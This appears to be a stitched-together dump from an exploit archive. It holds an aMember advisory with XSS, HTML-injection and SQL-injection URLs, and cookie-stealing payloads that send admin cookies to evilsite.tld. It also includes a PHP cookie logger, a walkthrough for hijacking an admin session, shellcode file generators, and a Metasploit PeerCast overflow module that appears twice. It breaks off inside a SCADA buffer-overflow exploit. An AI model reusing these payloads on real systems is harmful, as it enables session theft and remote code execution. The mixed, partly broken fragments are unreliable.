http://www.website.tld/amember/docs/changelog.txt
Information Disclosure:
http://www.website.tld/amember/docs/tester.php
http://www.website.tld/amember/setup.php?step='
http://www.website.tld/amember/admin/report.php?report=' (admin only)
- More files are affected. (discloses full path to the file)
Cross Site Scripting (admin only - might not survive a login screen!)
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
- More files might be affected.
HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name)
http://www.website.tld/amember/aff_signup.php (first- and last-name)
http://www.website.tld/amember/profile.php (first- and last-name)
HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)
Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
-- More files might be affected.
SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC
http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales
http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL'
-- More files might be affected, the depth of SQL Injection was not checked!
-:: Solution ::-
All the files are encrypted according to CGI Systems' website.
Questions and answers (quote)
I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology
Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)
Addition: The most easy solution would be to use a regular expression to fix this issue.
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
Firstname: "><script src="//intern0t.net/.j
Lastname: "></script> </
- Works in FireFox but should work in all browsers.
Firstname: "><iframe src="http://google.com
Lastname: "></iframe> </
- Works in all browsers.
Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)
The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
CookieLogger:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf");
?>
When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)
What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j
4) Make your last name:
"></script> </
5) Make your username:
aaaaaaaaa
6) After signing up, go to profile.php and make sure the first- and last-name are correct.
7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!
Conclusion:
The vendor was (originally) not contacted due to they have encrypted all of
the files and because i believe in full disclosure and open source!
The vendor was contacted the 25th May due to the vulnerability might be
exploited more than usual in the wild after public disclosure the 14th May.
Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1018-intern0t-amember-3-1-7-multiple-vulnerabilities.html
Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.
- OSVDB, CVE (Mitre) and CGI Systems contacted the 25th May.
# milw0rm.com [2009-05-29]

platforms/windows/dos/32420.c Executable file

@ -0,0 +1,163 @@
source: http://www.securityfocus.com/bid/31406/info
Mass Downloader is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to crash the application and trigger denial-of-service conditions, denying further service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Mass Downloader 2.6 is vulnerable; other versions may also be affected.
#include<windows.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
unsigned char bind_scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
unsigned char user_scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a"
unsigned char ra_sp2[] = "\xFF\xBE\x3F\x7E"; //massdown.dll
unsigned char ra_sp3[] = "\x7B\x30\xE4\x77"; //massdown.dll
unsigned char nops1[12]; //14115 * \x90
unsigned char nops2[2068]; //2068 * \x90
int main(int argc, char **argv)
{
int i;
FILE* f;
char* ra=NULL;
char* scode=NULL;
printf("[+] Mass Downloader 2.6 Remote Denial of Service PoC \n");
printf("[+] Discovered by Ciph3r <www.expl0iters.ir>\n");
printf("[+] Code by Ciph3r Ciph3r_blackhat[at]yahoo[dot]com\n");
if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
printf("Usage: %s target Ciph3r\n",argv[0]);
printf("Where target is:\n");
printf("0: winXP Pro SP2\n");
printf("1: win2k\n")
return EXIT_SUCCESS;
}
for(i=0;i<12;i++) nops1[i]='\x90';
nops1[12]='\0';
for(i=0;i<2068;i++) nops2[i]='\x90';
nops2[2068]='\0';
if(atoi(argv[1])==0) ra=ra_sp2;
else ra=ra_sp3;
if(atoi(argv[2])==0) scode=bind_scode;
else scode=user_scode;
f=fopen("Ciph3r.exe","wb");
fprintf(f,nops1,ra,nops2,scode,'\xd','\xa');
fflush(f);
fclose(f);
printf("Ciph3r.exe created!\n");
return EXIT_SUCCESS;
}
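Review bot: `nops1[12]='\0'` and `nops2[2068]='\0'` store one element past the end of `nops1[12]` and `nops2[2068]`, an out-of-bounds write that is undefined behavior; either size the arrays one larger, `unsigned char nops1[13];` and `unsigned char nops2[2069];`, or drop the terminators and fill with `memset(nops1, '\x90', sizeof nops1)`. `fprintf(f,nops1,ra,nops2,scode,'\xd','\xa')` passes a runtime buffer as the format string, which `-Wformat-security` flags and which silently discards every argument after the format; each buffer should be written with `fwrite` and an explicit length. `f=fopen("Ciph3r.exe","wb")` is never checked for NULL before the write, and the `bind_scode` initializer and `printf("1: win2k\n")` both lack a terminating `;`, so the file does not compile as posted. The comment `//14115 * \x90` does not match the 12-byte array it annotates. `main` is entirely inside this hunk.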

126
platforms/windows/dos/32428.txt Executable file

@ -0,0 +1,126 @@
source: http://www.securityfocus.com/bid/31431/info
ZoneAlarm Internet Security Suite is prone to a remote denial-of-service vulnerability that occurs in the TrueVector component when connecting to a malicious HTTP proxy.
ZoneAlarm Internet Security Suite 8.0.020 is vulnerable; other versions may also be affected.
za_crasher_proxy.b64 (Base64 Encoded File)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46
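--- a/platforms/windows/dos/32435.c
+++ b/platforms/windows/dos/32435.c
@@ -0,0 +1,46 @@
+/* Filename : Crash_POC.cpp
+# Exploit Title: [title]
+# Date: 20 March 2014
+# Exploit Author: Veysel HATAS (vhatas@gmail.com) - Web Page : www.binarysniper.net
+# Vendor Homepage: https://www.immunityinc.com/
+# Software Link: https://www.immunityinc.com/products-immdbg.shtml
+# Version: 1.85
+# Tested on: WinXP, Win7
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+int g_Count;
+void foo(char *data);
+int main(int argc, char* argv[])
+{
+g_Count = 0;
+foo(argv[1]);
+return 0;
+}
+void foo(char *data)
+{
+char salla[10];
+printf("Deneme - %d\n", g_Count);
+g_Count++;
+if (g_Count == 510){
+strcpy(salla, data);
+}
+try{
+foo(data);
+}
+catch(int e){
+printf("Error code is : %d", e);
+}
+}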
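Review bot: `foo(argv[1])` dereferences `argv[1]` without checking `argc`, so running the program with no argument passes NULL into `strcpy(salla, data)` and crashes for a reason unrelated to the one being demonstrated; guard with `if (argc < 2) return 1;`. The file uses `try`/`catch`, which is C++ (the header itself names it `Crash_POC.cpp`), yet it is stored under a `.c` path and the `# Exploit Title: [title]` placeholder was never filled in. The recursion in `foo` has no base case, and `catch(int e)` cannot catch the access violation or stack exhaustion that results, so the handler is dead code. Both functions are entirely inside this hunk.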


@ -1,119 +1,119 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::peercast_url_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 7144],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20\x0d",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in PeerCast <= v0.1216.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
}),
'Refs' =>
[
['OSVDB', '23777'],
['BID', '17040'],
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
],
'Targets' =>
[
['Windows 2000 English SP0-SP4', 0x75023360 ],
['Windows 2003 English SP0-SP1', 0x77d099e3 ],
['Windows XP English SP0/SP1', 0x77dbfa2c],
['Windows XP English SP0/SP2', 0x77dc12b8],
],
'Keys' => ['peercast'],
'DisclosureDate' => 'March 8 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $pattern = Pex::Text::AlphaNumText(1024);
# Return to EDI (offset 812)
substr($pattern, 768, 4, pack('V', $target->[1]));
# Jump back to the shellcode
substr($pattern, 812, 5, "\xe9".pack("V", -517));
# Insert he payload at offset 300 to avoid corruption
substr($pattern, 300, length($shellcode), $shellcode);
my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# milw0rm.com [2006-03-30]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::peercast_url_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 7144],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20\x0d",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in PeerCast <= v0.1216.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
}),
'Refs' =>
[
['OSVDB', '23777'],
['BID', '17040'],
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
],
'Targets' =>
[
['Windows 2000 English SP0-SP4', 0x75023360 ],
['Windows 2003 English SP0-SP1', 0x77d099e3 ],
['Windows XP English SP0/SP1', 0x77dbfa2c],
['Windows XP English SP0/SP2', 0x77dc12b8],
],
'Keys' => ['peercast'],
'DisclosureDate' => 'March 8 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $pattern = Pex::Text::AlphaNumText(1024);
# Return to EDI (offset 812)
substr($pattern, 768, 4, pack('V', $target->[1]));
# Jump back to the shellcode
substr($pattern, 812, 5, "\xe9".pack("V", -517));
# Insert he payload at offset 300 to avoid corruption
substr($pattern, 300, length($shellcode), $shellcode);
my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# milw0rm.com [2006-03-30]

214
platforms/windows/remote/32426.c Executable file

@ -0,0 +1,214 @@
source: http://www.securityfocus.com/bid/31418/info
DATAC RealWin SCADA server is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the context of the affected application. This may facilitate the complete compromise of affected computers. Failed exploit attempts may result in a denial-of-service condition.
RealWin SCADA server 2.0 is affected; other versions may also be vulnerable.
////////////////////////////////////////////////////////////////////
//// DATAC RealWin 2.0 SCADA Software - Remote PreAuth Exploit -.
//// --------------------------------------------------------
//// This code can only be used for personal study
//// and/or research purposes on even days.
////
//// The author is not responsible for any illegal usage.
//// So if you flood your neighborhood that's your f******* problem =)
//// ---------------
//// Note
//// ---------------
//// ## The exploit has been tested against a build that seems pretty old.
//// ## Therefore this flaw may be not reproducible on newer versions.
////
//// http://www.dataconline.com
//// http://www.realflex.com/download/form.php
////
//// Ruben Santamarta www.reversemode.com
////
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"wsock32.lib")
#define REALWIN_PORT 910
#define PACKET_HEADER_MAGIC 0x67542310
#define EXPLOIT_LEN 0x810
#define PING_LEN 0x200
#define FUNC_INFOTAG_SET_CONTROL 0x5000A
#define FUNC_PING 0x70001
typedef struct {
const char *szTarget;
ULONG_PTR retAddr;
} TARGET;
TARGET targets[] = {
{ "Windows 2000 SP4 [ES]", 0x779D4F6A}, // call esp - oleaut32.dll
{ "Windows 2000 SP4 [EN]", 0x77E3C256 }, // jmp esp - user32.dll
{ "Windows XP SP2 [EN]", 0x7C914393 }, // call esp - ntdll.dll
{ "Windows XP SP2 [ES]", 0x7711139B}, // call esp - oleaut32.dll
